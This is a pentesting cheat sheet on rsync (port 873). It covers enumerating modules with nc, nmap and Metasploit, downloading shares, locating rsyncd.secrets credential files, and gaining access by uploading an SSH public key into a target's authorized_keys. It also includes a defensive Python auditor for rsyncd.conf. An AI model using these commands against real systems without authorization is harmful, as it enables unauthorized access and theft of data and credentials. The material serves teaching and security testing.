# Pentesting Rsync

## Rsync port 873

* Basic information
* [https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync](https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync)
* [https://phoenixnap.com/kb/how-to-rsync-over-ssh](https://phoenixnap.com/kb/how-to-rsync-over-ssh)
* rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.

```
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the server to list
raidroot             <--- The server starts enumerating
USBCopy        	
NAS_Public     	
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Server closes the connection


#Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
```

* Enumerate shared folders
* An rsync module is essentially a directory share. These modules can optionally be protected by a password.
* These commands list the available modules and, optionally, determine whether a module requires a password to access:

```
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```

* Manual Rsync
* List a shared folder

```
rsync -av --list-only rsync://10.10.232.5/shared_name
```

* Copy all files to your local machine via the following command:

```
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```

* If you have credentials, you can list or download a share (you will be prompted for the password):

```
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
proxychains rsync -av --list-only rsync://svc_ipmi@172.16.210.34/svc_rsync
```

* You could also upload some content using rsync (for example, in this case we can upload an `authorized_keys` file to obtain access to the box):

```
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://rsync-connect@10.10.63.208/files/sys-internal/.ssh/authorized_keys
```

* Find the rsyncd configuration file:

```
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```

* The config file sometimes contains the parameter `secrets file = /path/to/file`; that file can contain the usernames and passwords allowed to authenticate to rsyncd.
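
For the defensive side of the checks above, this added example (not from the original page) audits an `rsyncd.conf` for modules that allow anonymous access, accept uploads, or show up in `#list` output. The sample config, its paths and the function names are constructed for illustration; line continuations and `&include` directives are not handled.

```python
import re

TRUE = {"yes", "true", "1"}  # boolean spellings rsyncd accepts as "on"

# Constructed sample config (module names reused from the banner example above).
SAMPLE_CONF = """\
uid = nobody
secrets file = /etc/rsyncd.secrets

[NAS_Public]
    path = /srv/public
    read only = no

[raidroot]
    path = /srv/raid
    auth users = backup
    list = no
"""

def parse_rsyncd_conf(text):
    """Return (globals, {module: params}) with normalised parameter names."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            current = modules.setdefault(section.group(1).strip(), {})
        elif "=" in line:
            key, value = line.split("=", 1)  # only the first "=" is significant
            key = " ".join(key.lower().split())
            (globals_ if current is None else current)[key] = value.strip()
    return globals_, modules

def audit(text):
    """Return sorted (module, finding) pairs for risky module settings."""
    globals_, modules = parse_rsyncd_conf(text)
    findings = []
    for name, params in modules.items():
        eff = {**globals_, **params}  # module values override global defaults
        if not eff.get("auth users", "").strip():
            findings.append((name, "no 'auth users': anonymous access"))
        if eff.get("read only", "yes").lower() not in TRUE:  # default is yes
            findings.append((name, "'read only' disabled: clients can upload"))
        if eff.get("list", "yes").lower() in TRUE:  # default is yes
            findings.append((name, "module is returned by #list enumeration"))
    return sorted(findings)
```

Calling `audit(SAMPLE_CONF)` flags only `NAS_Public`; a module that is both anonymous and writable is the configuration that permits the `authorized_keys` upload shown earlier.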

## Rsync Over SSH

```
rsync -av -e ssh rsync://user@host/share ./local-dir
rsync -av -e "ssh -p2222" rsync://user@host/share ./local-dir
```

